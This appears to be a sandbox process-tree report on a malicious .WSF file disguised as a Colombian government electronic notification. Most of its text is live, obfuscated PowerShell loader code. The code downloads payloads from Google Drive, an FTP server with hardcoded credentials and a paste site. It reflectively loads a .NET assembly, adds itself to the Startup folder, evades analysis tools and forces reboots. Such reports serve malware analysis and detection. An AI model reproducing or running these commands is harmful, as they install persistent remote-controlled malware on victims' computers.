'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AIAA9ACAATg' + [char]66 + 'sAHIAaA' + [char]66 + 'QACQAOwAgACkAJw' + [char]66 + '0AHgAdAAuADIAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAGwARw' + [char]66 + 'mAFQAUwAkADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgACcAOA' + [char]66 + 'GAFQAVQAnACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC0AIA' + [char]66 + 'WAHAAaw' + [char]66 + '1AEoAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAHYAWA' + [char]66 + 'VAFYAUgAkADsAIAApACAAeg' + [char]66 + 'uAGMAcQ' + [char]66 + 'uACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + '3ACQAIAA9ACAAdg' + [char]66 + 'YAFUAVg' + [char]66 + 'SACQAOwAgACkAcQ' + [char]66 + 'HAGwAbA' + [char]66 + 'sACQAIAAsAEIAQQ' + [char]66 + 'RAFEATAAkACgAbA' + [char]66 + 'hAGkAdA' + [char]66 + 'uAGUAZA' + [char]66 + 'lAHIAQw' + [char]66 + 'rAHIAbw' + [char]66 + '3AHQAZQ' + [char]66 + 'OAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUwAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAC0Adw' + [char]66 + 'lAG4AIAA9ACAAcw' + [char]66 + 'sAGEAaQ' + [char]66 + '0AG4AZQ' + [char]66 + 'kAGUAcg' + [char]66 + 'DAC4AdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAHcAJAA7ACAAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAgAD0AIA' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAdwAkADsAIAApACkAIAA0ADYAIAAsADQANgAgACwANAA2ACAALAA0ADYAIAAsADQANgAgACwANAA2ACAALAA2ADUAIAAsADUANQAgACwAMwA1ACAALAA5ADQAIAAsADkAOAAgACwAMAAwADEAIAAsADcAMQAxACAALAA5ADgAIAAsADIAMAAxACgAXQ' + [char]66 + 'dAFsAcg' + [char]66 + 'hAGgAYw' + [char]66 + 'bACAAbg' + [char]66 + 'pAG8AagAtACgAIAA9ACAAcQ' + [char]66 + 'HAGwAbA' + [char]66 + 'sACQAOwAgACkAKQA5ADQALAA2ADEAMQAsADcAOQAsADQAMQAxACwAOAA5ACwAOAAxADEALAA3ADAAMQAsADkAOQAsADUAMQAxACwAMQAwADEALAAwADAAMQAoAF0AXQ' + [char]66 + 'bAHIAYQ' + [char]66 + 'oAGMAWwAgAG4AaQ' + [char]66 + 'vAGoALQAoACAAPQAgAEIAQQ' + [char]66 + 'RAFEATAAkADsAKQAnAHQAeA' + [char]66 + '0AC4AMQAwAGwAbA' + [char]66 + 'kACcAIAArACAAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgACgAIAA9ACAAVg' + [char]66 + 'wAGsAdQ' + [char]66 + 'KACQAOwApACAAJw' + [char]66 + '0AHgAdAAuADEAMA' + [char]66 + 'MAEwARAAvADEAMAAvACcAIAArACAAJw' + [char]66 + 'yAGUAdA' + [char]66 + 'wAHkAcg' + [char]66 + 'jAHAAVQAvAHIAYgAuAG0Abw' + [char]66 + 'jAC4AdA' + [char]66 + 'hAHIAYg' + [char]66 + '2AGsAYw' + [char]66 + 'zAGUAZAAuAHAAdA' + [char]66 + 'mAEAAMQ' + [char]66 + '0AGEAcg' + [char]66 + 'iAHYAaw' + [char]66 + 'jAHMAZQ' + [char]66 + 'kAC8ALwA6AHAAdA' + [char]66 + 'mACcAKAAgAD0AIA' + [char]66 + '6AG4AYw' + [char]66 + 'xAG4AJAA7AH0AIAAKAA0AOw' + [char]66 + '0AGkAeA' + [char]66 + 'lACAAIAAgACAAIAAgAAoADQA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIA' + [char]66 + 'yAGUAdA' + [char]66 + '1AHAAbQ' + [char]66 + 'vAEMALQ' + [char]66 + '0AHIAYQ' + [char]66 + '0AHMAZQ' + [char]66 + 'SAAoADQAgAHsAZQ' + [char]66 + 'zAGwAZQAKAA0ACgANAH0ACgANACAAIAAgACAAIAAgACAACgANACAAewApAGwAbA' + [char]66 + '1AE4AJAAgAHEAZQAtACAAKQ' + [char]66 + 'lAHUAbg' + [char]66 + 'pAHQAbg' + [char]66 + 'vAEMAeQ' + [char]66 + 'sAHQAbg' + [char]66 + 'lAGwAaQ' + [char]66 + 'TACAAYQ' + [char]66 + 'lAC0AIAAnAGUAeg' + [char]66 + '5AGwAYQ' + [char]66 + 'uAGEAJwAsACcAUw' + [char]66 + 'OAEQAZQ' + [char]66 + '0AGEAcA' + [char]66 + 'hACcALAAnAGsAcg' + [char]66 + 'hAGgAcw' + [char]66 + 'lAHIAaQ' + [char]66 + 'XACcAIA' + [char]66 + 'zAHMAZQ' + [char]66 + 'jAG8Acg' + [char]66 + 'wAC0AdA' + [char]66 + 'lAGcAKAAoAGYAaQA7ACAAMgAxAHMAbA' + [char]66 + 'UADoAOg' + [char]66 + 'dAGUAcA' + [char]66 + '5AFQAbA' + [char]66 + 'vAGMAbw' + [char]66 + '0AG8Acg' + [char]66 + 'QAHkAdA' + [char]66 + 'pAHIAdQ' + [char]66 + 'jAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'sAG8AYw' + [char]66 + 'vAHQAbw' + [char]66 + 'yAFAAeQ' + [char]66 + '0AGkAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOwAgAH0AZQ' + [char]66 + '1AHIAdAAkAHsAIAA9ACAAaw' + [char]66 + 'jAGEAYg' + [char]66 + 'sAGwAYQ' + [char]66 + 'DAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'kAGkAbA' + [char]66 + 'hAFYAZQ' + [char]66 + '0AGEAYw' + [char]66 + 'pAGYAaQ' + [char]66 + '0AHIAZQ' + [char]66 + 'DAHIAZQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAewAgAGUAcw' + [char]66 + 'sAGUAfQAgAGYALwAgADAAIA' + [char]66 + '0AC8AIA' + [char]66 + 'yAC8AIA' + [char]66 + 'lAHgAZQAuAG4Adw' + [char]66 + 'vAGQAdA' + [char]66 + '1AGgAcwAgADsAJwAwADgAMQAgAHAAZQ' + [char]66 + 'lAGwAcwAnACAAZA' + [char]66 + 'uAGEAbQ' + [char]66 + 'tAG8AYwAtACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'sAGwAZQ' + [char]66 + 'oAHMAcg' + [char]66 + 'lAHcAbw' + [char]66 + 'wADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgACkAIAAnAHAAdQ' + [char]66 + '0AHIAYQ' + [char]66 + '0AFMAXA' + [char]66 + 'zAG0AYQ' + [char]66 + 'yAGcAbw' + [char]66 + 'yAFAAXA' + [char]66 + '1AG4AZQ' + [char]66 + 'NACAAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'TAFwAcw' + [char]66 + '3AG8AZA' + [char]66 + 'uAGkAVw' + [char]66 + 'cAHQAZg' + [char]66 + 'vAHMAbw' + [char]66 + 'yAGMAaQ' + [char]66 + 'NAFwAZw' + [char]66 + 'uAGkAbQ' + [char]66 + 'hAG8AUg' + [char]66 + 'cAGEAdA' + [char]66 + 'hAEQAcA' + [char]66 + 'wAEEAXAAnACAAKwAgAFoAdw' + [char]66 + 'mAHcAVQAkACAAKAAgAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'uAGkAdA' + [char]66 + 'zAGUARAAtACAAJwAlAEkAaA' + [char]66 + 'xAFIAWAAlACcAIA' + [char]66 + 'tAGUAdA' + [char]66 + 'JAC0AeQ' + [char]66 + 'wAG8AQwAgADsAIA' + [char]66 + '0AHIAYQ' + [char]66 + '0AHMAZQ' + [char]66 + 'yAG8AbgAvACAAdA' + [char]66 + 'lAGkAdQ' + [char]66 + 'xAC8AIA' + [char]66 + 'YAEcAQw' + [char]66 + 'DAEoAIA' + [char]66 + 'lAHgAZQAuAGEAcw' + [char]66 + '1AHcAIA' + [char]66 + 'lAHgAZQAuAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAIAA7ACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAag' + [char]66 + 'NAE8Aeg' + [char]66 + 'IACQAKAAgAD0AIA' + [char]66 + 'YAEcAQw' + [char]66 + 'DAEoAOwApACAAZQ' + [char]66 + 'tAGEATg' + [char]66 + 'yAGUAcw' + [char]66 + 'VADoAOg' + [char]66 + 'dAHQAbg' + [char]66 + 'lAG0Abg' + [char]66 + 'vAHIAaQ' + [char]66 + '2AG4ARQ' + [char]66 + 'bACAAKwAgACcAXA' + [char]66 + 'zAHIAZQ' + [char]66 + 'zAFUAXAA6AEMAJwAoACAAPQAgAFoAdw' + [char]66 + 'mAHcAVQAkADsAKQAgACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAag' + [char]66 + 'NAE8Aeg' + [char]66 + 'IACQAKAAgACwAdg' + [char]66 + 'mAHEAbQ' + [char]66 + 'uACQAKA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHEAdw' + [char]66 + 'qAHYAegAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + 'xAHcAag' + [char]66 + '2AHoAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + 'xAHcAag' + [char]66 + '2AHoAJAA7AH0AOwAgACkAJw' + [char]66 + '3ADUAMA' + [char]66 + 'aADEAOA' + [char]66 + '1AGMANw' + [char]66 + 'aAE0ASwA4ADgAZw' + [char]66 + 'lAHQAaA' + [char]66 + 'qAG4AQQ' + [char]66 + 'wAGoAMQ' + [char]66 + 'MAEIALQA0AHkASA' + [char]66 + 'hAGEAMQAnACAAKwAgAHYAZg' + [char]66 + 'xAG0AbgAkACgAIAA9ACAAdg' + [char]66 + 'mAHEAbQ' + [char]66 + 'uACQAewAgAGUAcw' + [char]66 + 'sAGUAfQA7ACAAKQAnAFYARQ' + [char]66 + 'TAGQAag' + [char]66 + '3AFUAOQA1AFIALQ' + [char]66 + 'XAHMAWQ' + [char]66 + '1AFoATA' + [char]66 + 'pAHcAcg' + [char]66 + 'iADUAWQ' + [char]66 + 'OAFEALQ' + [char]66 + 'IAGoAcg' + [char]66 + 'iADIAcAAxACcAIAArACAAdg' + [char]66 + 'mAHEAbQ' + [char]66 + 'uACQAKAAgAD0AIA' + [char]66 + '2AGYAcQ' + [char]66 + 'tAG4AJA' + [char]66 + '7ACAAKQAgAGkAZg' + [char]66 + 'tAHUAWAAkACAAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcw' + [char]66 + 'uAGkAYQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC4ARQ' + [char]66 + 'SAFUAVA' + [char]66 + 'DAEUAVA' + [char]66 + 'JAEgAQw' + [char]66 + 'SAEEAXw' + [char]66 + 'SAE8AUw' + [char]66 + 'TAEUAQw' + [char]66 + 'PAFIAUAA6AHYAbg' + [char]66 + 'lACQAIAA9ACAAaQ' + [char]66 + 'mAG0AdQ' + [char]66 + 'YACQAOwAnAD0AZA' + [char]66 + 'pACYAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'kAD0AdA' + [char]66 + 'yAG8AcA' + [char]66 + '4AGUAPw' + [char]66 + 'jAHUALw' + [char]66 + 'tAG8AYwAuAGUAbA' + [char]66 + 'nAG8Abw' + [char]66 + 'nAC4AZQ' + [char]66 + '2AGkAcg' + [char]66 + 'kAC8ALwA6AHMAcA' + [char]66 + '0AHQAaAAnACAAPQAgAHYAZg' + [char]66 + 'xAG0AbgAkADsAKQAgACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAGoATQ' + [char]66 + 'PAHoASAAkACAAKAAgAGwAZQ' + [char]66 + 'kADsAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'qAE0ATw' + [char]66 + '6AEgAJA' + [char]66 + '7ACAAKQAgAEMAZQ' + [char]66 + 'PAEkAYwAkACAAKAAgAGYAaQA7ACAAKQAyACgAcw' + [char]66 + 'sAGEAdQ' + [char]66 + 'xAEUALg' + [char]66 + 'yAG8Aag' + [char]66 + 'hAE0ALg' + [char]66 + 'uAG8AaQ' + [char]66 + 'zAHIAZQ' + [char]66 + 'WAC4AdA' + [char]66 + 'zAG8AaAAkACAAPQAgAEMAZQ' + [char]66 + 'PAEkAYwAkACAAOwA=';$nymcr = $nymcr.replace('уЦϚ' , 'B') ;;$cpdfb = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $nymcr ) ); $cpdfb = $cpdfb[-1..-$cpdfb.Length] -join '';$cpdfb = $cpdfb.replace('%XRqhI%','C:\Users\Admin\Downloads\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF');powershell $cpdfb
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1748
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $cIOeC = $host.Version.Major.Equals(2) ;if ( $cIOeC ) {$HzOMj = [System.IO.Path]::GetTempPath();del ( $HzOMj + '\Upwin.msu' );$nmqfv = 'https://drive.google.com/uc?export=download&id=';$Xumfi = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $Xumfi ) {$nmqfv = ($nmqfv + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$nmqfv = ($nmqfv + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$zvjwq = (New-Object Net.WebClient);$zvjwq.Encoding = [System.Text.Encoding]::UTF8;$zvjwq.DownloadFile($nmqfv, ($HzOMj + '\Upwin.msu') );$UwfwZ = ('C:\Users\' + [Environment]::UserName );JCCGX = ($HzOMj + '\Upwin.msu'); powershell.exe wusa.exe JCCGX /quiet /norestart ; Copy-Item 'C:\Users\Admin\Downloads\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF' -Destination ( $UwfwZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit; };$nqcnz = ('ftp://[email protected]/Upcrypter' + '/01/DLL01.txt' );$JukpV = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$LQQAB = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($LQQAB, $lllGq) ;$RVUXv = $webClient.DownloadString( $nqcnz ) ;$RVUXv | Out-File -FilePath $JukpV -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $JukpV ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$aeDwU = '$sNwoM = ''C:\Users\Admin\Downloads\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF'' ; $ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$aeDwU += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''↓:↓'',''A'') ) ;' ;$aeDwU += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$aeDwU += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$aeDwU += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''0/zpfHt/d/ee.etsap//:sptth'' , $sNwoM , ''DDDMSBuild'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$aeDwU | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};"
        5⤵
        Drops startup file
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2948
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe JCCGX /quiet /norestart
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1452
        
        C:\Windows\system32\wusa.exe
        
        "C:\Windows\system32\wusa.exe" JCCGX /quiet /norestart
        7⤵
        Drops file in Windows directory
        
        PID:1968
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1516
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF"
    3⤵
    - Blocklisted process makes network request
    - Suspicious use of WriteProcessMemory
    PID:2440
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $nymcr = 'Ow' + [char]66 + '9ADsAIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAAgAGUAbA' + [char]66 + 'pAEYALQAgAHMAcw' + [char]66 + 'hAHAAeQ' + [char]66 + 'CACAAeQ' + [char]66 + 'jAGkAbA' + [char]66 + 'vAFAAbg' + [char]66 + 'vAGkAdA' + [char]66 + '1AGMAZQ' + [char]66 + '4AEUALQAgAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAFUAdw' + [char]66 + 'EAGUAYQAkADsAIAApACAAJwAxAHMAcAAuADMAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAHoAVw' + [char]66 + 'XAEIAVgAkADsAJwA7ACkAIAApACAAIAAnACcAZA' + [char]66 + 'sAGkAdQ' + [char]66 + 'CAFMATQ' + [char]66 + 'EAEQARAAnACcAIAAgACwAIA' + [char]66 + 'NAG8Adw' + [char]66 + 'OAHMAJAAgACwAIAAnACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAHAAYQ' + [char]66 + 'zAHQAZQAuAGUAZQAvAGQALw' + [char]66 + '0AEgAZg' + [char]66 + 'wAHoALwAwACcAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJwAnAEkAVg' + [char]66 + 'GAHIAcAAnACcAIAAoAGQAbw' + [char]66 + 'oAHQAZQAnACAAPQArACAAVQ' + [char]66 + '3AEQAZQ' + [char]66 + 'hACQAOwAgACcATQ' + [char]66 + '0AGUARwAuACkAIAAnACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAJwAgACgAZQ' + [char]66 + 'wAHkAVA' + [char]66 + '0AGUARwAnACAAPQArACAAVQ' + [char]66 + '3AEQAZQ' + [char]66 + 'hACQAOwAgACcALgApACAAeg' + [char]66 + 'kAGYAeQ' + [char]66 + 'GACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAJwAgACsAIAAnADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAJwAgAD0AKwAgAFUAdw' + [char]66 + 'EAGUAYQAkADsAIAAnADsAIAApACAAKQAnACcAQQAnACcALAAnACcAkyE6AJMhJwAnACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAcgAuAEcAZQ' + [char]66 + 'hAHkAcgAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwA0ADYAZQ' + [char]66 + 'zAGEAQg' + [char]66 + 'tAG8Acg' + [char]66 + 'GADoAOg' + [char]66 + 'dAHQAcg' + [char]66 + 'lAHYAbg' + [char]66 + 'vAEMALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAcw' + [char]66 + 'bACAAPQAgAHoAZA' + [char]66 + 'mAHkARgAkACAAXQ' + [char]66 + 'dAFsAZQ' + [char]66 + '0AHkAQg' + [char]66 + 'bACcAIAA9ACsAIA' + [char]66 + 'VAHcARA' + [char]66 + 'lAGEAJAA7ACAAJwA7ACkAOA' + [char]66 + 'GAFQAVQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAtACAAJwAgACsAIA' + [char]66 + 'sAEcAZg' + [char]66 + 'UAFMAJAAgACsAIAAnACAAaA' + [char]66 + '0AGEAUAAtACAAdA' + [char]66 + 'uAGUAdA' + [char]66 + 'uAG8AQwAtAHQAZQ' + [char]66 + 'HACgAIAA9ACAARw' + [char]66 + 'lAGEAeQ' + [char]66 + 'yACQAIAA7ACAAJwAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAnACAAPQAgAE0Abw' + [char]66 + '3AE4AcwAkACcAIAAgAD0AIA' + [char]66 + 'VAHcARA' + [char]66 + 'lAGEAJAA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIA' + [char]66 + 'sAEcAZg' + [char]66 + 'UAFMAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAHoASA' + [char]66 + 'sAFQAdQAkADsAIAApACAAQQ' + [char]66 + 'VAHoASA' + [char]66 + 'EACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAE4AbA' + [char]66 + 'yAGgAUAAkACAAPQAgAHoASA' + [char]66 + 'sAFQAdQAkADsAIAApACAAVg' + [char]66 + 'wAGsAdQ' + [char]66 + 'KACQAIA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC0AIA' + [char]66 + '0AG4AZQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC0AdA' + [char]66 + 'lAEcAIAAoACAAPQAgACAAQQ' + [char]66 + 'VAHoASA' + [char]66 + 'EACQAOwAgADgARg' + [char]66 + 'UAFUAOgA6AF0AZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AdA' + [char]66 + '4AGUAVAAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4ATg' + [char]66 + 'sAHIAaA' + [char]66 + 'QACQAOwAgAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + 'XAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUwAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AIAA9ACAATg' + [char]66 + 'sAHIAaA' + [char]66 + 'QACQAOwAgACkAJw' + [char]66 + '0AHgAdAAuADIAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAGwARw' + [char]66 + 'mAFQAUwAkADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgACcAOA' + [char]66 + 'GAFQAVQAnACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC0AIA' + [char]66 + 'WAHAAaw' + [char]66 + '1AEoAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAHYAWA' + [char]66 + 'VAFYAUgAkADsAIAApACAAeg' + [char]66 + 'uAGMAcQ' + [char]66 + 'uACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 